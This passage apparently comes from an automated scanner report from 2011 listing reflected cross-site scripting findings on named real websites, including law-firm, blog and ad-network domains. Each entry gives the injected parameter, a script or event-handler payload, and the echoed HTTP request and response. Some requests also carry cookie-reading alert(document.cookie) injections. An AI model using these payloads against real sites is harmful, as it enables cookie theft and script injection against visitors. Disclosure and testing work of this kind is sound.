The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b5131<script>alert(1)</script>ac69988ca2e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.wileyrein.com/p.json?callback=_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.wileyrein.com%2Fjsfe969%252522%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253ec77ca9823dd%2Fui.dialog.js&ref=http%3A%2F%2Fburp%2Fshow%2F5&2lh2lm HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:41 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:41 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 18:00:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 18:00:41 GMT Connection: close
4.28. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://financaspessoais.blog.br
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8184"><script>alert(1)</script>c42c81b1212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8184\"><script>alert(1)</script>c42c81b1212 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f8184"><script>alert(1)</script>c42c81b1212=1 HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:16 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?f8184\"><script>alert(1)</script>c42c81b1212=1#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff57"><script>alert(1)</script>29569e332da was submitted in the utm_campaign parameter. This input was echoed as aff57\"><script>alert(1)</script>29569e332da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57"><script>alert(1)</script>29569e332da HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:50 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259b8"><script>alert(1)</script>8849500d1f1 was submitted in the utm_content parameter. This input was echoed as 259b8\"><script>alert(1)</script>8849500d1f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:30 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8\"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1033"><script>alert(1)</script>f894aad5354 was submitted in the utm_medium parameter. This input was echoed as e1033\"><script>alert(1)</script>f894aad5354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badgee1033"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:02 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badgee1033\"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab23b"><script>alert(1)</script>dbf1985e564 was submitted in the utm_source parameter. This input was echoed as ab23b\"><script>alert(1)</script>dbf1985e564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=bloggerab23b"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:48 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=bloggerab23b\"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45a3"><script>alert(1)</script>2751ef5eaae was submitted in the utm_term parameter. This input was echoed as a45a3\"><script>alert(1)</script>2751ef5eaae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:15 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3\"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372 was submitted in the REST URL parameter 1. This input was echoed as 3018b"><img src=a onerror=alert(1)>23dd898c372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ Server: nginx/0.7.65 Date: Wed, 19 Jan 2011 15:23:41 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 5920
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5 was submitted in the REST URL parameter 1. This input was echoed as f3bd2"><img src=a onerror=alert(1)>edbe5526fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html Server: nginx/0.7.65 Date: Wed, 19 Jan 2011 15:23:42 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 5835
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="toolsf3bd2"><img src=a onerror=alert(1)>edbe5526fa5_expose" class="msie tools"> ...[SNIP]...
4.36. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jonesdaydiversity.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a088d<script>alert(1)</script>e11cd877bb9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=K08784a088d<script>alert(1)</script>e11cd877bb9&auto=t HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=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; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 19 Jan 2011 18:01:06 GMT Cache-Control: max-age=86400, private Expires: Thu, 20 Jan 2011 18:01:06 GMT Content-Type: application/javascript;charset=ISO-8859-1 Date: Wed, 19 Jan 2011 18:01:05 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9" was not recognized. */
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed76e'-alert(1)-'ef86bc64d25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Date: Wed, 19 Jan 2011 18:09:18 GMT Server: TornadoServer/1.0 Content-Length: 2205 Connection: Close
4.39. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://rafael.adm.br
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb7d"><script>alert(1)</script>21b58676d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb7d\\\"><script>alert(1)</script>21b58676d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ffb7d"><script>alert(1)</script>21b58676d82=1 HTTP/1.1 Host: rafael.adm.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 19 Jan 2011 16:58:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.10-2ubuntu6 Vary: Cookie X-Pingback: http://rafael.adm.br/xmlrpc.php Content-Length: 43014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="http://rafael.adm.br/page/2/?ffb7d\\\"><script>alert(1)</script>21b58676d82=1"> ...[SNIP]...
4.40. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /fca/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.41. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /hc/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.42. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.43. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://skaddenpractices.skadden.com
Path: /sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe165'%3balert(1)//8402f0b736c was submitted in the username parameter. This input was echoed as fe165';alert(1)//8402f0b736c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/?username=rafaelpfe165'%3balert(1)//8402f0b736c HTTP/1.1 Host: twittercounter.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:03:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Expires: Sat, 29 Jan 2011 18:03:39 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 448
<!-- document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelpfe165';alert(1)//8402f0b736c" title="TwitterCounter for @rafaelpfe165';alert(1)//8402f0b736c" target="_blank"> ...[SNIP]...
The value of the dn request parameter is copied into a JavaScript inline comment. The payload e35b9*/alert(1)//6ec7245ba5b was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=e35b9*/alert(1)//6ec7245ba5b HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37b7"%3balert(1)//97f91a6f73c was submitted in the dn parameter. This input was echoed as f37b7";alert(1)//97f91a6f73c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=f37b7"%3balert(1)//97f91a6f73c HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into the HTML document as text between TITLE tags. The payload 6c6ee</title><script>alert(1)</script>4caa1df9615 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=6c6ee</title><script>alert(1)</script>4caa1df9615 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58025'%3balert(1)//1b423bdb38b was submitted in the dn parameter. This input was echoed as 58025';alert(1)//1b423bdb38b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=58025'%3balert(1)//1b423bdb38b HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload 778ef<script>alert(1)</script>584f04eb84a was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=778ef<script>alert(1)</script>584f04eb84a HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eec5"><script>alert(1)</script>da4345821a9 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=9eec5"><script>alert(1)</script>da4345821a9 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/java ...[SNIP]... <meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5"> ...[SNIP]...
The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c682d'><script>alert(1)</script>0eba87e9935 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=c682d'><script>alert(1)</script>0eba87e9935 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce31'%3balert(1)//60c9f7c43e2 was submitted in the qkwid1 parameter. This input was echoed as 9ce31';alert(1)//60c9f7c43e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw9ce31'%3balert(1)//60c9f7c43e2&submitid1=sqkw HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b6d'%3balert(1)//dd5166876a6 was submitted in the submitid1 parameter. This input was echoed as c9b6d';alert(1)//dd5166876a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkwc9b6d'%3balert(1)//dd5166876a6 HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
